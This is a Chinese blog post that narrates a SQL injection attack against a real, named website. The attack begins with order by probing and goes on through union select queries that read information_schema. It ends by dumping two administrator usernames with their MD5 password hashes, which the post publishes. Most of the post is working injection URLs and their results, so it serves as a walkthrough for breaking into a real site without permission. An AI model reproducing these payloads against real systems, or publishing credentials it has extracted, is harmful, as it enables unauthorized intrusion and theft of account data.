记一次TOM入侵检测

1

首先,本文没有任何技术含量,再者,请勿将本文提供信息用作非法用途。

正文开始

在茫茫“网海”冲浪,偶然间看到一个链接格式为php?id= 习惯性的加了个'(也许我该请个心理医生咨询咨询)

错误,虽然没有任何提示,内容消失了

然后,闲着也是闲着

首先注入地址

http://webi.tom.com/content.php?id=658

先爆字段长度

http://webi.tom.com/content.php?id=658 order by 14 返回正常

http://webi.tom.com/content.php?id=658 order by 15 返回错误

字段数为15,接下来伪造地址

http://webi.tom.com/content.php?id=658 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

返回结果中2为文章标题,8 5 在文章正文处显示,继续伪造读取服务器信息

http://webi.tom.com/content.php?id=658 and 1=2 union select 1,version() ,3,4,user(),6,7,database(),9,10,11,12,13,14/*

返回结果显示

数据库:web@localhost
用户:webi
版本:5.0.41

继续猜测表名称

http://webi.tom.com/content.php?id=658 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14 from information[去掉我]_schema.TABLES limit 0,1/*

结果居然是admin,汗颜,早知道就直接检测字段了,转换字段admin = 0x61646D696E ,伪造检测字段语句

http://webi.tom.com/content.php?id=658 and 1=2 Union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14 from information[去掉我]_schema.COLUMNS where TABLE_NAME=0x61646D696E limit 0,1

根据结果判断

用户名字段:name
密码字段:password

读取用户密码信息

http://webi.tom.com/content.php?id=658 and 1=2 union select 1,name,3,4,password,6,7,8,9,10,11,12,13,14 from admin limit 0,1/*

得到结果如下

管理员A账号:edit
管理员A密码MD5值:bc8b1a45120733a8314adb486245815f

管理员B账号:zhaodi
管理员B密码MD5值:92992fe1f754afcc5c95c05cd3c3afde

接下来就是破解密码MD5值,寻找登陆入口,我到MD5检测的网站检测了下,提示说找到检测结果,但是要收费才给显示··晕。

到这里就告一段落吧,因为~ 我真的困了。

共 1 条评论

  1. 回复

    想不到你也是性情中人啊!哈哈哈 :mrgreen:

发表评论

您的邮箱不会公开,当您的评论有新的回复时,会通过您填写的邮箱向您发送评论内容。 必填字段 *

为何看不到我发布的评论?

正在提交, 请稍候...